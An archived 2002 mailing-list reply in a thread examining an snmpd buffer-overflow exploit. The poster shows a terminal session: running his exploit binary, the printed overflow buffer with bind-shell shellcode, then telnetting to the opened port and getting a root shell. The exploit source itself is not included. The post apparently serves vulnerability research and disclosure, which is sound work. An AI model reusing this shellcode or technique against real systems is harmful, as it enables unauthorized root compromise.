Vulnerability Development mailing list archives

Re: snmpd exploit examination - snmpwalk

From: xbud <xbud () g0thead com>
Date: Thu, 21 Feb 2002 17:05:02 -0600

that's great.. 
but how would you explain a root shell sitting on a port i defined on an 
exploit i didn't release?

note! I still haven't tested the "Zen-Parse" one .

[root@dejaking /root]# snmpd
[root@dejaking /root]# whereis snmpd
snmpd: /usr/sbin/snmpd /usr/man/man1/snmpd.1.gz
[root@dejaking /root]# ps -ef | grep snmpd
root     15027     1  6 18:05 pts/2    00:00:00 snmpd
root     15030 14973  0 18:05 pts/2    00:00:00 grep snmpd
[root@dejaking /root]# gdb /usr/sbin/snmpd
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) at 15027
Attaching to program: /usr/sbin/snmpd, Pid 15027
Reading symbols from /usr/lib/libucdagent.so.0...
(no debugging symbols found)...done.
Reading symbols from /usr/lib/libucdmibs.so.0...(no debugging symbols 
found)...
done.
<snip>

0x4020c17e in __select () from /lib/libc.so.6
(gdb) c
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) c
Continuing.
: command not found


[xbud@dejaking xbud]$ ./ecksploit -20
sizeof(buffer) = 256
ret = 0xbfffd61c
buffer = 
Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ
¿Öÿ¿å1Ò²fÐ1ÉËC]øC]ôKMüMôÍ1ÉEôCf]ìfÇEî'MðEì
EøÆEüÐMôÍÐCCÍÐCÍÃ1É²?ÐÍÐAÍë?^1ÀFE
                                                °
                                                 óU
                                                      Íèãÿÿÿ/bin/shÿ¿
Timeout: No Response from 127.0.0.1
[xbud@dejaking xbud]$ netstat -an --tcp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:3879            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:6011            0.0.0.0:*               LISTEN
tcp        0      0 xx.xx.xx.xx:22         24.28.xx.xx:64408    ESTABLISHED
tcp        0      0 0.0.0.0:6010            0.0.0.0:*               LISTEN
tcp        0      0 xx.xx.xx.xx:22         24.28.xx.xx:64407    ESTABLISHED

[xbud@dejaking xbud]$ telnet localhost 3879
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
id;
uid=0(root) gid=0(root) 
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
(wheel)
pwd;
/root

cheers, 
xbud

tested on both 4.1.1 and 4.0.1 source and default install's.

cheers
On Wednesday 20 February 2002 03:14 pm, you wrote:

Current thread:

snmpd exploit examination - snmpwalk KF (Feb 21)
- Re: snmpd exploit examination - snmpwalk Syzop (Feb 21)
- Message not available
  - Re: snmpd exploit examination - snmpwalk KF (Feb 21)
- Re: snmpd exploit examination - snmpwalk xbud (Feb 21)
- <Possible follow-ups>
- Re: snmpd exploit examination - snmpwalk The Itch (Feb 21)